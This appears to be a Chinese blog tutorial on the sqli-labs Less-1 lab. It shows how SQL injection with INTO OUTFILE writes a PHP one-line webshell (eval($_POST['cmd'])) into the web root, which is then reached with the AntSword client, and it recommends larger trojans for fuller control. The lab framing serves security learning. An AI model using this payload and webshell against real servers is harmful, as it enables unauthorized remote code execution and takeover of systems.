美文网首页
0823.1292天:SQL注入上传木马

0823.1292天:SQL注入上传木马

作者: 我的职业生涯 | 来源:发表于2022-08-22 11:58 被阅读0次

#每日三件事,第1292天#

特别说明:请遵守《网络安全法》、《刑法》以及《民法典》等相关法律。本文仅仅用于技术研究,凡是利用本文提供的技术和方法从事非法活动的,本人不承担任何责任。

SQL注入其实是通过获得应用系统对数据的操作账户,然后在数据库中读取相关信息,进而通过数据库提供的命令对操作系统的文件进行读写。这时候,就有机会对操作系统上传木马。

非常必要的前提就是:这个账户对当前目录有写的权限。


通过SQL注入写入文件

可以看到,test.php文件是通过mysql账户写进去的。

连接数据库的账户

从这里可以看到连接数据库用的是root账户,权限还是最高的。

root的权限

再看看操作系统中目录的权限:


Less-1目录的权限

这个目录被我改成了777,并没有其他什么隐含的权限。

一旦有写的权限,此服务器就有机会被上传木马。

以sqli-lab的Less1为例说一下怎么上传木马:

第一:修改Less-1目录的权限

chmod -R 777 Less-1 

第二:上传PHP一句话木马

http://127.0.0.1/Less-1/?id=1' 
union select 1,2,"<?php eval($_POST['cmd']);?>"  
into outfile "/var/www/html/Less-1/test.php" 
--+

第三:通过蚁剑连接木马


蚁剑连接木马 蚁剑连接结果

如果感觉一句话木马不够厉害的话,可以继续上传更大的马对系统进行操控。

相关文章

  • 0823.1292天:SQL注入上传木马

    #每日三件事,第1292天# 特别说明:请遵守《网络安全法》、《刑法》以及《民法典》等相关法律。本文仅仅用于技术研...

  • Web安全之如何获取一个WebShell

    SQL注入获取Webshell ** ** 条件: 利用: 防御: 上传漏洞获取Webshell** *...

  • Web测试(十)安全性测试

    •(1) 认证与授权 • (2)Session和cookie • (3)文件上传漏洞 • (4)SQL 注入 • ...

  • Web应用程序攻击

    web攻击技术:SQL技术(脚本注入攻击)、XSS攻击(跨站脚本攻击)、上传漏洞(文件上传) 网站结构:登录页面 ...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • 笔记:web漏洞

    SQL注入 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,...

  • 谈谈sql注入之原理和防护(-)

    谈谈sql注入(二)谈谈sql注入(三)谈谈sql注入(四)所谓SQL注入,就是通过把SQL命令插入到Web表单提...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • 安全性测试

    安全性测试 • 认证与授权 • Session和cookie • 文件上传漏洞 • SQL 注入 • XSS 跨站...

  • 第四章 SQL 注入

    要点 SQL注入 SQL注入防护 一、SQL注入 SQL注入:黑客会通过构造一些恶意的输入参数,在应用拼接 SQL...

网友评论

      本文标题:0823.1292天:SQL注入上传木马

      本文链接:https://www.haomeiwen.com/subject/lbrwgrtx.html